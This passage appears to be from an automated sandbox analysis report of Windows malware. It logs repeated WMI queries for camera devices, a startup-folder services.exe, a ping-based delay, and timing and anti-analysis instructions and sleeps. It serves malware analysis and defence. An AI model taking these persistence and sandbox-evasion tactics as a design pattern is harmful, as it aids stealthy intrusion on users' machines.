                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                                    Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                                    Source: C:\ProviderWebSavesNet\hostcrt.exe Memory allocated: 10E0000 memory reserve | memory write watch
                                    Source: C:\ProviderWebSavesNet\hostcrt.exe Memory allocated: 1AD30000 memory reserve | memory write watch
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Memory allocated: 1310000 memory reserve | memory write watch
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Memory allocated: 1AD10000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe Memory allocated: 17A0000 memory reserve | memory write watch
                                    Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\services.exe Memory allocated: 1B3A0000 memory reserve | memory write watch
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Code function: 11_2_00007FFD9BC832D0 rdtsc 11_2_00007FFD9BC832D0
                                    Source: C:\ProviderWebSavesNet\hostcrt.exe Code function: 4_2_00007FFD9BC6773D sldt word ptr [eax] 4_2_00007FFD9BC6773D
                                    Source: C:\ProviderWebSavesNet\hostcrt.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 922337203685477
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 600000
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 599874
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 599766
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 599657
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 599532
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 599407
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 599297
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 599188
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 599063
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 3600000
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 598946
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 598844
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 598735
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 598610
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 598485
                                    Source: C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe Thread delayed: delay time: 598360
